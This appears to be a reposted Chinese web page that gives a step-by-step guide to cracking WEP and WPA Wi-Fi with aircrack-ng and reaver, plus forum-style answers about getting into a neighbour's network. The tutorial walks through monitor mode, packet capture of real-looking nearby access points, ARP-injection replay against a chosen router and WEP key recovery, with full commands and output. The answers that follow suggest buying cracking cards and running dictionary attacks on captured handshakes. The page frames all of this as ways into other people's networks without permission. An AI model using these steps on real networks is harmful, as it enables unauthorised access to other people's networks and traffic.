怎么用kali linux 破解无线

怎么用kali linux 破解无线,第1张

kali Linux下破解wifi非常简单,全程只能用下一步来描述。 工具路径 /usr/share/fern-wifi-cracker python execute.py 即可运行图形化工具 选择无线网卡wlan0 然后点击下面的激活。 打开发现的wifi热点设备 先加载字典,勾上Automate 然后单击你

一. 软硬件环境

硬件: cubieboard2

系统: debian (理论上基于debian的 *** 作系统都可以, 如ubuntu, lubuntu, 等等)

无线网卡: RT3070_usb (其它无线网卡是否支持抓包以及驱动的安装方法请自行谷歌)

由于以下所有工具的编译都是直接在cubieboard里进行的, 所以要在cubieboard里构建编译环境:

# apt-get install gcc make

rt3070驱动安装:

# apt-get install firmware-ralink

二. 安装aircrack-ng

1. 下载aircrack-ng源码

# wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

# tar -zxvf aircrack-ng-1.1.tar.gz

2. 安装必要的库文件

# apt-get install libssl-dev

否则编译时会报错:

In file included from aircrack-ng.c:65:0:

crypto.h:12:26: fatal error: openssl/hmac.h: No such file or directory

compilation terminated.

make[1]: *** [aircrack-ng.o] Error 1

make[1]: Leaving directory `/home/code/wifi/aircrack-ng-1.1/src'

make: *** [all] Error 2

3. 修改编译配置文件

# vi common.mak

搜索Werror这行, 将:

CFLAGS ?= -g -W -Wall -Werror -O3

改成:

CFLAGS ?= -g -W -Wall -O3

否则编译时报错:

Linux.c: In function ‘is_ndiswrapper’:

linux.c:165:17: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘linux_set_rate’:

linux.c:334:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘linux_set_channel’:

linux.c:807:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘linux_set_freq’:

linux.c:896:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘set_monitor’:

linux.c:1022:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘do_linux_open’:

linux.c:1366:12: error: variable ‘unused_str’ set but not used [-Werror=unused-but-set-variable]

linux.c:1352:15: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]

linux.c: In function ‘get_battery_state’:

linux.c:1982:35: error: variable ‘current’ set but not used [-Werror=unused-but-set-variable]

cc1: all warnings being treated as errors

make[3]: *** [linux.o] Error 1

4. 编译,安装

# make

# make install

三. 安装reaver(穷举PIN码方式破解工具)

1. 下载reaver源码

http://code.google.com/p/reaver-wps/downloads/list

2. 安装必要的库文件

# apt-get install libpcap-dev libsqlite3-dev

否则configure的时候报错:

checking for pcap_open_live in -lpcap... no

error: pcap library not found!

3. 编译,安装

# cd src

# ./configure

# make

# make install

四. 安装minidwep-gtk(图形界面工具, 可选)

deb包, 直接下载安装即可, 本文只专注于纯命令行破解, 图形工具安装步骤略

五. 破解步骤

1. 安装wireless-tools

# apt-get install wireless-tools iw

否则在使用airmon-ng命令时会报错:

Wireless tools not found

或者

ERROR: Neither the sysfs interface links nor the iw command is available.

2. 查看自己的无线网卡的名称,一般是wlan0或者wifi0

# ifconfig -a

3. 开启无线网卡监控功能

# airmon-ng start wlan0

注:wlan0为你的无线设备名称

这一步可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX, XXX为给出的进程号,然后重新执行上句, 直到不报错

4. 选择要破解的wifi, 获取其SSID, MAC, CHANNEL

4.1 用airodump-ng扫描

# airodump-ng mon0

会列出所有扫描到的AP列表, 如:

CH 13 ][ Elapsed: 1 min ][ 2014-05-03 23:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1D:0F:6A:0A:F6 -1 0 0 0 108 -1

00:23:CD:26:4A:B8 -59 19 20 0 6 54 . WEP WEP MERCURY

08:18:1A:89:D8:8C -63 19 0 0 1 54e WPA CCMP PSK ChinaNet-HbDm

EC:17:2F:B9:18:32 -77 11 0 0 6 54e. WPA2 CCMP PSK

08:10:76:6D:9B:74 -78 13 0 0 6 54e WPA2 CCMP PSK ZBH

F0:7D:68:55:AF:F4 -77 11 1 0 6 54e WPA2 CCMP PSK TL

AC:6E:1A:73:D7:85 -80 10 0 0 11 54e WPA2 CCMP PSK ChinaNet-43Bs

62:6E:1A:73:D7:86 -79 13 0 0 11 54e WPA2 CCMP PSK iTV-43Bs

A8:15:4D:13:0F:28 -78 19 1 0 11 54 . WPA2 CCMP PSK 2-703_TPLINK

38:83:45:7C:FE:00 -80 5 0 0 6 54e. WPA2 CCMP PSK xiaoer

20:DC:E6:F1:F1:82 -81 11 0 0 6 54e. WPA2 CCMP PSK XMing

6C:E8:73:5B:A3:2A -81 16 0 0 1 54e. WPA2 CCMP PSK HUANG

C8:3A:35:32:BA:88 -81 8 0 0 8 54e WPA CCMP PSK LYX

14:E6:E4:43:66:CA -81 2 0 0 4 54e. WPA2 CCMP PSK TP-LINK_4366CA

D8:15:0D:4D:18:18 -82 7 0 0 3 54e WPA2 CCMP PSK TP-LINK_805

8C:BE:BE:23:A5:AC -82 7 0 0 3 54e WPA2 CCMP PSK Xiaomi_las

9C:D2:4B:44:8B:68 -83 5 0 0 8 54e WPA CCMP PSK ChinaNet-bwwg

08:10:74:AB:61:7E -82 6 0 0 6 54 WPA TKIP PSK Netcore

00:1E:2A:67:EF:B0 -84 13 0 0 11 54 . WPA2 CCMP PSK SecondBegining

28:2C:B2:2C:A8:5C -84 20 0 0 11 54e. WPA2 CCMP PSK TP407

04:8D:38:00:A8:CB -21 47 181 0 7 54e WPA2 CCMP PSK

BSSID STATION PWR Rate Lost Packets Probes

00:1D:0F:6A:0A:F6 E0:B9:A5:05:D2:3D -76 0 - 1 19 6

00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -1 48 - 0 0 16

00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -80 0 - 2 20 8

04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -78 0e-12e 0 179

选取一个信号好的, 连接的客户端活跃的就可以.

如果想破解WEP, 我们选取的AP信息:

SSID : MERCURY

MAC : 00:23:CD:26:4A:B8

CHANNEL : 6

ENC : WEP

如果想破解WPA/WPA2, 我们选取的AP信息:

SSID :

MAC : 04:8D:38:00:A8:CB

CHANNEL : 7

ENC : WPA2

4.2 这一步用wireless-tools或者windows下的工具WirelessMon也可以

5. 破解WEP

5.1 抓取足够的通信数据包

# airodump-ng --ivs -w packet -c 6 wlan0

或者

# airodump-ng --ivs -w packet -c 6 --bssid 00:23:CD:26:4A:B8 wlan0 //可以加--bssid参数限定只抓特定AP的数据包

参数解释:

--ivs 这里的设置是通过设置过滤,不再将所有无线数据保存,而只是保存可用于破解的IVS数据报文,这样可以有效地缩减保存的数据包大小;

-c 这里我们设置目标AP的工作频道,通过刚才的观察,我们要进行攻击的无线路由器channel为6;

-w 后跟要保存的文件名,所以输入自己希望保持的文件名, 这里会生成packet-xx.ivs文件, xx是序号。后文中破解时使用ivs包可用通配符代替, 如packet-*.ivs

抓包界面如下:

CH 6 ][ Elapsed: 12 mins ][ 2014-05-04 00:23

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:8D:38:00:A8:CB -24 0 3 3 0 7 54e WPA2 CCMP PSK beiyu@foxmail.com

00:23:CD:26:4A:B8 -59 46 582 729 0 6 54 . WEP WEP MERCURY

EC:17:2F:B9:18:32 -75 65 458 139 1 6 54e. WPA2 CCMP PSK TARO

F0:7D:68:55:AF:F4 -78 43 461 24 0 6 54e WPA2 CCMP PSK TL

20:DC:E6:F1:F1:82 -80 33 367 0 0 6 54e. WPA2 CCMP PSK XMing

8C:21:0A:18:17:46 -78 74 513 3 0 6 54e. WPA2 CCMP PSK VincentKasim

38:83:45:7C:FE:00 -79 36 399 0 0 6 54e. WPA2 CCMP PSK xiaoer

08:10:74:AB:61:7E -82 1 261 0 0 6 54 WPA TKIP PSK Netcore

08:10:76:6D:9B:74 -82 27 277 0 0 6 54e WPA2 CCMP PSK ZBH

00:25:86:66:42:6E -83 4 19 0 0 6 54 . WEP WEP FAST_66426E

00:87:15:25:85:2C -83 90 508 18 0 6 54e WPA2 CCMP PSK RT8888

14:E6:E4:56:E2:B6 -83 0 29 0 0 6 54e. WEP WEP pig

40:16:9F:76:82:A2 -84 0 1 0 0 6 22e. WPA2 CCMP PSK WH

38:83:45:CA:42:26 -84 0 1 0 0 6 54e. WPA2 CCMP PSK tp-link n1

BSSID STATION PWR Rate Lost Packets Probes

04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -80 0 - 1e 0 152

00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -76 54 - 1 0 82

00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -82 54 - 1 0 763

5.2 对目标AP使用ArpRequest注入攻击

若连接着该无线路由器/AP的无线客户端正在进行大流量的交互,比如使用迅雷、电骡进行大文件下载等,则可以依靠单纯的抓包就可以破解出WEP密码

但是无线黑客们觉得这样的等待有时候过于漫长,于是就采用了一种称之为“ARP Request”的方式来读取ARP请求报文,并伪造报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程,

这种方法就称之为ArpRequest注入攻击。输入命令(新开一个终端)如下:

# aireplay-ng -3 -b [AP's MAC] -h [Client's MAC] mon0

参数解释:

-3 指采用ARPRequesr注入攻击模式;

-b 后跟AP的MAC地址,这里就是前面我们探测到的SSID为TPLINK的AP的MAC;

-h 后跟客户端的MAC地址,也就是我们前面探测到的有效无线客户端的MAC;

例如

# aireplay-ng -3 -b 00:23:CD:26:4A:B8 -h D0:22:BE:EE:E8:A4 mon0

回车后将会看到如下所示的读取无线数据报文,从中获取ARP报文的情况出现。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether D0:22:BE:EE:E8:A4

23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6

Saving ARP requests in replay_arp-0503-235500.cap

You should also start airodump-ng to capture replies.

Read 3943 packets (got 0 ARP requests and 13 ACKs), sent 0 packets...(0 pps)

在等待片刻之后,一旦成功截获到ARP请求报文,我们将会看到如下图13所示的大量ARP报文快速交互的情况出现。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether D0:22:BE:EE:E8:A4

23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6

Saving ARP requests in replay_arp-0503-235500.cap

You should also start airodump-ng to capture replies.

Read 13943 packets (got 1 ARP requests and 131 ACKs), sent 12 packets...(566 pps)

Read 14045 packets (got 40 ARP requests and 231 ACKs), sent 123 packets...(566 pps)

Read 14132 packets (got 132 ARP requests and 452 ACKs), sent 234 packets...(566 pps)

Read 14212 packets (got 156 ARP requests and 645 ACKs), sent 567 packets...(566 pps)

Read 14223 packets (got 196 ARP requests and 1090 ACKs), sent 845 packets...(566 pps)

此时回到airodump-ng的界面查看,作为MERCURY的packets栏的数字在飞速递增, 一般该值达到1万5千以上, 就可以进行下一步的破解, 很复杂的密码需要8万以上的IVS。

5.3 使用aircrack-ng破解WEP

在抓取的无线数据报文达到了一定数量后,一般都是指IVs值达到1万以上时,就可以开始破解,若不能成功就等待数据报文的继续抓取然后多试几次。

注意,此处不需要将进行注入攻击的终端关闭,而是另外开一个终端进行同步破解。输入命令如下:

# aircrack-ng 捕获的ivs文件

例如:

# aircrack-ng packet-*.ivs

关于ivs的值数量,我们可以从如下所示的界面中看到,当前已经接受到的IVs已经达到了1万5千以上,aircrack-ng已经尝试了16万个组合。

Aircrack-ng 1.1

[00:01:01] Tested 163814 keys (got 15081 IVs)

KB depth byte(vote)

0 55/ 61 AA(13248) 39(13212) BC(13212) CE(13212) 79(13208) EB(13200) 04(13128) 61(13124) 57(13088) 4F(13060) C9(13048) 75(13024) 8F(12984) A4(12984)

1 12/ 14 49(14740) 88(14628) 86(14564) D8(14520) 7C(14272) 5B(14192) 22(14160) 10(14120) 05(14040) 0E(14012) A8(13976) 87(13932) E2(13828) 5D(13796)

2 38/ 2 09(13724) ED(13608) 40(13600) 24(13572) 7E(13572) C0(13572) 50(13560) 06(13492) 97(13432) C6(13432) 23(13392) 0B(13388) B2(13316) AB(13312)

3 2/ 3 9E(16764) A8(15876) 7A(15808) 12(15800) 4B(15740) 28(15440) 53(15368) 16(15036) 69(14936) 5E(14920) 91(14892) 74(14780) 45(14772) 99(14604)

4 16/ 4 7B(14488) 4A(14384) F1(14308) 86(14228) A1(14228) 5C(14128) 17(14120) 6C(14120) 7F(14088) 02(14084) 31(14052) BF(14016) C1(14008) 0C(14004)

KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )

Decrypted corretly: 100%

注意: 高强度复杂密码破解成功依赖于更多的IVs, 如13位复杂密码需要8万多IVs.

万能钥匙解不开隔壁的wifi,有什办法么

教你,自己附近无线密码可以用电脑破开,掏宝买个清风卡王卡皇,大神多年了别买到冒名的,在电脑上自己附近wifi都能扫描破到密吗,很给力,破完手机再用,万能钥匙只是分享没啥用,别说我没告诉你,有用别忘了采纳

有流量怎么破隔壁wifi。wifi万能钥匙解不开

万能钥匙不是所有wifi都能破的,所以可以的话,直接去问问看能不能告诉你

万能钥匙破解不了隔壁的WIFI ,什么方法可以破解?

检视是什么型别加密。

1,cm,cm-edu,最好是畅无线,支援免费使用上网,都是必须下载app应用;

2,如果是wep,直接用电脑破解,搜寻“windows下wep破解”,或者使用卡皇最垃圾的一般不超十分钟搞定,淘宝上看(手机也有但是电脑的演算法快。

可以破解WEP的有:BT3、BT4、BEINI、CDLINUX都可以。

3,如果是wpa,wpa2。卡皇也是可以破解的,主要是密码锁的网路都是可以破解,只是时间问题。一般破解十几个小时很平常的。如果是想要安卓手机破解,可以试试wifi破解大师,也是采用穷举法破解,也就是说一个密码不重复尝试猜包,一个晚上能破解算幸运了。(手机配置好才越好哦)除此还可以试试万能钥匙,虽然是仅有十五个常用密码猜,如果是大城市可以看到很多支援无线免费的,二线城市用处就不大了。

4,对了电信麦当劳都是试用上网限时的,手机注册下即可,我就不说了。

隔壁wifi密码改了,万能钥匙解不开了怎么办

可以使用万能钥匙进行连线已被分享WIFI。连线成功后可以在应用商城里面搜寻WIFI密码检视器,就可以检视WIFI密码了,前提是需要ROOT许可权。如果没有被分享会麻烦一点,需要有大量的密码字典。然后通过CDlinux无线系统,进行抓取WIFI握手包,进行跑字典就可以了,能不能成功取决于字典还有只是时间问题。

怎么破解隔壁的wifi密码?下载的万能钥匙破不了了!

去他家串串门,问他呗

我隔壁的无限网讯号很强万能钥匙打不开有别的办法开启吗

wifi万能钥匙所以能够连线wifi热点,是有人共享了该wifi网路的账号和密码,wifi万能钥匙在破解连线的时候下载了资料比对成功,才可以连线了该wifi网路。

如果wifi网路没有被分享是无法破解连线上网路的,万能钥匙也是无能为力爱莫能助的。

目前不可能有这样的软体可以做到,真正可以破解连线搜寻到的wifi网路。

wifi万能钥匙解不开怎么办

是一款自动获取周边免费Wi-Fi热点资讯并建立连线的android手机必备工具。 所有的热点资讯基于云端资料库,内建全国数万Wi-Fi热点资料,随时随地轻松接入无线网路,最大化使用各种联网的移动服务,扫除无网断网的状态,尤其适合商务人群、移动人群和重度网虫。

重点是:

你有一个wifi网路你可以进入,当然你知道密码,当你成功接入后,如果你也同意了分享你的网路,则云端会储存你的网路的地址和SSID及进入密码。这样,当其他人在你wifi网路的覆盖范围内时,则他会向云端请求密码,如果你分享了。则这个你不认识的人会很轻松的进入你的wifi网路。

也就是网路资源共享,并不是他能解了别人的密码。

wifi万能钥匙有时解不开

很正常,万能钥匙说白了就是通过收集被解开过的密码,记录下来,形成一个密码库,使用者在破解的时候,它就用密码库里的密码逐一尝试,所以,如果该密码不存在于密码本里就破解不掉了

我手机接收隔壁的Wi讯号强就是万能钥匙打不开

没有分享热点,或者人家的高阶

为什么Wifi万能钥匙带有钥匙的解不开

若该加密Wi-Fi热点已共享,则可以使用万能钥匙进行连线使用;若该加密Wi-Fi热点尚未共享,则不可以共享该热点。

wifi密码可以连入wifi但看不到密码。wifi万能钥匙的原理其实很简单:

1:共享别人在它资料库里共享过的密码给所有人

2:根据自带密码词典,破解弱密码,如(00000000)。

此软体存在争议,建议慎用。


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/yw/7220492.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-04-03
下一篇2023-04-03

发表评论

登录后才能评论

评论列表(0条)

    保存